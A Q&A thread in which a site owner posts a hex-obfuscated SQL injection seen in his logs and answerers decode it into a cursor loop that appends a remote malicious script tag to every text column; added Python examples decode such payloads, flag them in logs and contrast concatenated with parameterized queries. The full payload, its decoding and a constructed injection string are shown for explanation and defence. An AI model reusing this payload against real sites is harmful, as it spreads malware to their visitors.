views: 464
answers: 4

I have seen this SQL injection attempt on my site many times in the last few months.

';DECLARE @S CHAR(4000);SET @S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777322E73383030716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777322E73383030716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72 AS CHAR(4000));EXEC(@S);

After going through my code, I'm sure I'm protected because I query against an in-memory dataset rather than the database itself. However, even though I'm sure I'm protected, I don't fully understand what's going on with this attack attempt and would like to figure it out so I can avoid writing code in the future that may be vulnerable to it.

Can anyone explain to me what these hackers are attempting to do with this code?

Thanks.

-This code is getting appended to the query string as well as getting sent as post data.

+12  A: 

Note: my first explanation was incorrect because I didn't actually read through the whole thing...

Here's what that translates to. It searches your database for text or varchar columns (b.xtype in 99,35,231,167) and then injects a javascript file into all text columns in your database. A bit more malicious than I first thought.

DECLARE
    @T varchar(255),
    @C varchar(4000)

DECLARE Table_Cursor CURSOR FOR
    select a.name,b.name
    from sysobjects a,syscolumns b
    where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C

WHILE(@@FETCH_STATUS=0)
BEGIN
    exec('update ['+@T+'] set ['+@C+']=''"></title><script src="http://www2.s800qn.cn/csrss/w.js"></script><!--''+['+@C+'] where '+@C+' not like ''%"></title><script src="http://www2.s800qn.cn/csrss/w.js"></script><!--''')
    FETCH NEXT FROM Table_Cursor INTO @T,@C
END

CLOSE Table_Cursor
DEALLOCATE Table_Cursor
Jimmy
@Jimmy: how did you decipher this?
Dan Vinton
I ran it on my sql server :P
Jimmy
if you wanted to do it manually, every 2 hex digits defines a number 0-255, which you look up in an ASCII table.
Jimmy
Thanks, I'm glad I understand what's going on there now. It looks like one of those attacks that can be thwarted by the standard methods of avoiding SQL injection, but I'm glad I understand it further now.
Ryan Smith
it's designed to defeat blacklists. another example of why blacklisting keywords is a bad idea
Jimmy
"I ran it on my sql server" - Ha! +1 for bravery! It's a good way of obfuscating SQL anyway...
Dan Vinton
I didn't run the last "EXEC(@S);", of course ;)
Jimmy
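Jimmy's comment that every two hex digits are one byte can be turned into a small triage tool for the request logs the question mentions. The following Python is an added example, not code from this thread: it embeds a constructed log line carrying a prefix of the hex from the question (the prefix decodes to the DECLARE line and the start of the cursor definition; the full hex can be pasted in its place), decodes any CAST(0x... AS CHAR(...)) it finds, and flags decoded SQL that walks sysobjects/syscolumns with a cursor. The log-line layout, the regex and the keyword list are assumptions made for the example.

```python
import re

# Constructed log line: a request carrying the same shape of payload as the one
# quoted in the question. The hex is a prefix of the question's hex, split into
# labelled pieces so each can be checked against an ASCII table by hand.
HEX_PREFIX = (
    "4445434C41524520"            # "DECLARE "
    "405420"                      # "@T "
    "7661726368617228323535292C"  # "varchar(255),"
    "404320"                      # "@C "
    "7661726368617228343030302920"  # "varchar(4000) "
    "4445434C41524520"            # "DECLARE "
    "5461626C655F437572736F7220"  # "Table_Cursor "
    "435552534F5220"              # "CURSOR "
    "464F5220"                    # "FOR "
    "73656C65637420"              # "select "
    "612E6E616D652C622E6E616D6520"  # "a.name,b.name "
    "66726F6D20"                  # "from "
    "7379736F626A6563747320"      # "sysobjects "
    "612C737973636F6C756D6E7320"  # "a,syscolumns "
    "62"                          # "b"
)
SAMPLE_LOG_LINE = (
    "2008-09-01 12:00:00 GET /page.aspx id=1';DECLARE @S CHAR(4000);SET @S=CAST(0x"
    + HEX_PREFIX
    + " AS CHAR(4000));EXEC(@S); 200"
)

# Matches the CAST(0x... AS CHAR/VARCHAR/NVARCHAR(n)) wrapper used to hide the SQL.
HEX_CAST = re.compile(
    r"CAST\(0x([0-9A-Fa-f]+)\s+AS\s+N?(?:VAR)?CHAR\(\d+\)\)", re.IGNORECASE
)

# Assumed indicators: decoded SQL that enumerates the catalogue and runs dynamic SQL.
SUSPICIOUS = ("sysobjects", "syscolumns", "cursor", "exec(", "update ")


def decode_hex(hexdigits: str) -> str:
    """Every two hex digits are one byte (0-255); bytes.fromhex does the table lookup
    Jimmy describes. An odd number of digits cannot be a whole byte sequence."""
    if len(hexdigits) % 2:
        raise ValueError("hex payload has an odd number of digits")
    # errors="replace" keeps the decoder alive on non-ASCII bytes (e.g. UCS-2 payloads)
    return bytes.fromhex(hexdigits).decode("ascii", errors="replace")


def extract_payloads(text: str) -> list:
    """Decode every hex-wrapped CAST found in a request line; returns decoded SQL strings."""
    return [decode_hex(match.group(1)) for match in HEX_CAST.finditer(text)]


def looks_like_mass_update(decoded_sql: str) -> bool:
    """True when at least two of the indicators appear in the decoded SQL."""
    lowered = decoded_sql.lower()
    return sum(word in lowered for word in SUSPICIOUS) >= 2


if __name__ == "__main__":
    for sql in extract_payloads(SAMPLE_LOG_LINE):
        print("flagged" if looks_like_mass_update(sql) else "not flagged", "->", sql)
```

Run it against a whole access log by calling `extract_payloads` on each line; a hit whose decoded text trips `looks_like_mass_update` is worth checking against the database contents, since by the time it is logged the batch has already been attempted.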
+2  A: 

Further to Jimmy's post: you can also use a hex-ascii translator to get this:

DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR select
a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and
(b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT
FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN
exec('update ['+@T+'] set ['+@C+']=''"></title><script src="http://www2.s800qn.cn
/csrss/w.js"></script><!--''+['+@C+'] where '+@C+' not like ''%"></title><script
src="http://www2.s800qn.cn/csrss/w.js"></script><!--''')FETCH NEXT FROM Table_Cursor INTO
@T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor
Michael Sharek
I ran into this a while back and created a small Winforms app that will do the translation for you as well, thanks to some help from some SO folks here: http://www.codeplex.com/urldecoder
Dillie-O
http://www.string-functions.com/hex-string.aspx
jms
Wow, I went to all that crazy work and yet there was already a web site that slipped through my googling fingers... Well, at least I learned some new stuff through the process. 8^D
Dillie-O
+4  A: 

Actually Jimmy, if you analyze this code, it uses a cursor to inject a javascript reference to http://www2.s800qn.cn/csrss/w.js in every text field in the database.

This means that they don't care about your database, what they want is to use your page to steal data from the users browsing it.

That javascript link is now dead, but it probably contained code to grab the users cookies.

FlySwat
yeah, I noticed that after I posted my original answer, so I rewrote. Thanks for the catch
Jimmy
Cripes... does StackOverflow automatically make any "http://blahblah.com" strings into active links? I know you didn't do that on purpose! :)
Bryan
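FlySwat's point (the loop rewrites every text column) together with Ryan's and Jimmy's comments under the first answer (standard anti-injection practice stops this; keyword blacklists do not) can be shown side by side. The Python below is an added example, not code from this thread: it uses an in-memory SQLite table as a stand-in for the site's database, a constructed SQLite-dialect input that does to one column what the decoded cursor loop does to all of them (with a placeholder script host), and a constructed, shortened copy of the hex-wrapped form from the question. The vulnerable search pastes the input into the statement and runs it as a batch, the way a SQL Server batch submitted by a web page would run; the parameterized search hands the same input to the driver as a value.

```python
import re
import sqlite3

# Constructed placeholder for the injected markup; the real payload pointed at
# a .js file on the attacker's host, replaced here by a placeholder hostname.
SCRIPT_TAG = '"></title><script src="http://example.invalid/w.js"></script>'

# Constructed SQLite-dialect input: closes the literal the page opened, then appends
# SCRIPT_TAG to every row of the column. Its trailing quote is closed by the quote
# the vulnerable code appends, so the batch stays syntactically valid.
SQLITE_STYLE_INPUT = (
    "'; UPDATE products SET name = name || '" + SCRIPT_TAG + "' WHERE 1=1 OR name = '"
)

# Constructed, shortened copy of the form seen in the question: the statement is
# hidden inside a hex literal, so no SQL keyword appears in clear text.
MSSQL_STYLE_INPUT = (
    "';DECLARE @S CHAR(4000);SET @S=CAST(0x7570646174652074 AS CHAR(4000));EXEC(@S);"
)

# The sort of keyword blacklist Jimmy's comment refers to (assumed word list).
BLACKLIST = re.compile(r"\b(update|insert|delete|drop)\b|<script", re.IGNORECASE)


def blacklist_blocks(value: str) -> bool:
    """True if a keyword filter would reject the input."""
    return BLACKLIST.search(value) is not None


def fresh_db() -> sqlite3.Connection:
    """In-memory stand-in for the site's database: one table with one text column."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany("INSERT INTO products (name) VALUES (?)", [("anvil",), ("rope",)])
    conn.commit()
    return conn


def search_concatenated(conn: sqlite3.Connection, term: str) -> None:
    """Vulnerable: the term is pasted into the statement text. executescript runs
    the whole batch, as SQL Server does for a batch sent by a web page, so the
    UPDATE smuggled in after the closed literal executes too."""
    conn.executescript("SELECT name FROM products WHERE name = '" + term + "'")


def search_parameterized(conn: sqlite3.Connection, term: str) -> list:
    """Safe: the term reaches the driver as a value, never as statement text, so
    quotes and semicolons in it cannot end the literal or add a statement."""
    rows = conn.execute("SELECT name FROM products WHERE name = ?", (term,))
    return [row[0] for row in rows]


def all_names(conn: sqlite3.Connection) -> list:
    return [row[0] for row in conn.execute("SELECT name FROM products ORDER BY id")]


def demo() -> dict:
    """Run the same hostile input through both code paths and report the table state."""
    conn = fresh_db()
    before = all_names(conn)
    matched = search_parameterized(conn, SQLITE_STYLE_INPUT)  # no row has that name
    after_parameterized = all_names(conn)
    search_concatenated(conn, SQLITE_STYLE_INPUT)
    after_concatenated = all_names(conn)
    return {
        "before": before,
        "parameterized_matches": matched,
        "after_parameterized": after_parameterized,
        "after_concatenated": after_concatenated,
        "blacklist_catches_plain": blacklist_blocks(SQLITE_STYLE_INPUT),
        "blacklist_catches_hex_wrapped": blacklist_blocks(MSSQL_STYLE_INPUT),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, value)
```

The two blacklist results are the point Jimmy makes: the filter catches the plain-text form and misses the hex-wrapped one, while the parameterized query needs no filter at all because the input never becomes part of the statement.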
+2  A: 

Just to help if you haven't figured it out already: this is an automated attack, not a targeted one. The purpose of the included .js file is distributing malware by using your website; it includes several exploits, mostly targeting IE users.

dr. evil